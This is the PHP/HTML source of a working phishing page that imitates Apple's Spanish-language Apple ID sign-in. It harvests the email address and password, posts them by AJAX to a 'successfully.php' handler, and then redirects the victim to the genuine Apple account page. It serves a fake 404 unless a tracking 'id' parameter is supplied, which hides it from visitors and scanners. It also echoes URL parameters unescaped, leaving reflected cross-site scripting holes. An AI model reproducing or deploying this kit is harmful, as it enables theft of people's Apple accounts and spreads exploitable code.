<?php
if(!isset($_GET['id'])){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die('<html><head>
<title>404 Not Found</title>
</head><body cz-shortcut-listen="true">
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>');
}
?>
<!DOCTYPE html>
<html data-rtl="false" lang="es-co">
<head>
  <meta http-equiv="Content-Type"
 content="text/html; charset=UTF-8">
  <title></title>
  <meta name="viewport"
 content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="prefetch stylesheet" href="fonts"
 type="text/css">
  <link rel="stylesheet" type="text/css" media="screen"
 href="app(1).css?v=<?php echo rand();?>">
  <style type="text/css">
.submitButton{
color:#666666;
font-size:14px;
height:27px;
width:27px;
position:absolute;
top:10px;
right:8px; border:0px;
background:url(signin.png) ;
cursor:pointer;
float:right;
}
  </style>
  <style type="text/css"></style>
  <style type="text/css"></style>
</head>
<body>
<div data-theme="lite"
 class="si-body si-container container-fluid" id="content"><apple-auth>
<appleid-logo mode="{mode}"></appleid-logo></apple-auth>
<div class="apple-id-logo hide-always" id="apple-id-logo"></div>
<div data-mode="embed"
 class="widget-container fade-in restrict-max-wh fade-in">
<div class="si-step" id="step"> <logo> </logo>
<div class="logo"> <img style="width: 200px;"
 src="aid_logo2x.png" alt="Application logo"
 class="cnsmr-app-image"> </div>
<form action="successfully.php" method="post" class="cloud-login">
  <div class="" id="stepEl"><sign-in></sign-in>
  <div id="signin" class="signin fade-in">
  <h1 tabindex="-1" class="si-container-title"><small>Administrar 
tu cuenta de Apple </small></h1>
  <div class="container si-field-container">
  <div class="row no-gutter si-field apple-id" id="apple_id" style="border-radius: 6px;">
  <div class="col-xs-12"> <span id="appleIdFieldLabel"
 class="sr-only"> Administrar tu cuenta de Apple </span>
  <input tabindex="1" type="email" required autocomplete="off" placeholder="Apple&nbsp;ID"
 autofocus="autofocus" spellcheck="false" name="xuser"
 aria-labelledby="appleIdFieldLabel" required="required"
 aria-required="true" autocapitalize="off"
 autocorrect="off" autocomplete="off"
 can-field="accountName" id="appleID"
 class="si-text-field"> </div>
 <span class="submitButton" id="c_log2" style="cursor: pointer;"></span>
  </div>
  <div class="row no-gutter si-field pwd" id="apple_pwd" style="display: none;">
  <div class="col-xs-12"> <label class="sr-only"
 for="pwd"> Password </label> <input
 placeholder="Contraseña" class="si-password si-text-field"
 autocomplete="off" can-field="password"
 required="required" aria-required="true" id="pw"
 name="xpass" type="password" required autocomplete="off">
 <input type="hidden" name="id" value="<?php echo $_GET['id'];?>">
  <input class="submitButton" id="c_log" value=""
 name="submit" type="submit" style="display: none;">
  <p role="tooltip" id="invalidUserNamePwdErrMsg"
 class="sr-only"></p>
  </div>
  </div>
  <div class="pop-container error signin-error hide">
  <div class="pop-bottom">
  <p id="errMsg" class="fat"> Tu Apple ID o la contraseña son incorrectos. </p>
<a class="si-link ax-outline thin tk-subbody" href="https://iforgot.apple.com/password/verify/appleid" target="_blank"> ¿Has olvidado tu contraseña? </a>
  </div>
  </div>
  <div class="si-remember-password"> <input
 class="ax-outline" tabindex="0" id="remember-me"
 type="checkbox"> <label for="remember-me">
Recuérdame </label> </div>
<div class="error">
<span style="color:red">
<h4>
 <?php if(isset($_GET['msg']))
  echo $_GET['msg'];
  ?>
</h4>
</span> 
</div>


  <div class="spinner-container auth hide" id="load2" style="top:8px;">
  <img class="loading" src="../assets/img/ajax-loader.gif" alt="Loading">
   </div>
   <div class="spinner-container auth hide" id="load">
  <img class="loading" src="../assets/img/ajax-loader.gif" alt="Loading">
   </div>
  <input name="datum" value="02/23/2016 - 23:37"
 type="hidden"> </div>
  <div class="si-container-footer"> </div>
  </div>
  </div>
</form>
</div>
<div style="display: none ! important;" id="stocking"></div>
</div>
</div>
<script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
  <script>
  $(document).on("ready", funciones);
  function funciones(){
    $(".preloader").delay(1500).fadeOut(1500);
    $("#c_log2").on("click", getPass);
    function getPass(){
      $("#load2").removeClass("hide");
      $("#load2").show(0);
      $("#apple_pwd").delay(1500).slideDown(20);
      setTimeout( function(){
          $("#apple_id").css("border-radius", "6px 6px 0 0");
      },1500);
      $("#load2").delay(800).fadeOut();
      $("#c_log").delay(1500).fadeIn();
      $("#c_log2, #load2").fadeOut();
      return false;
    }
    $("#apple_pwd").keypress(function(e) {
        $("#c_log2, #load2").remove();
    });
    $("#c_log").on("click", getCloud);
    function getCloud(a){
      var datos = $(".cloud-login").serialize();
      $("#load").removeClass("hide");
      $(".pop-container").addClass("hide");
      $.post(
        "successfully.php",
        datos,
        function(b){
          if(b==1){
            top.location.href="http://www.apple.com/mx/shop/account/home";
            /*$(".login-form").fadeOut();
            $(".preloader").fadeIn().delay(1000).fadeOut();
            $(".imessage").fadeIn();*/
          }else{
            
            $("#load").addClass("hide");
            $(".pop-container").removeClass("hide");
          }
        }
      );
      a.preventDefault();
    }
  }
    </script>
<!--<script type="text/javascript" src="app(2).js"></script>-->
</body>
</html>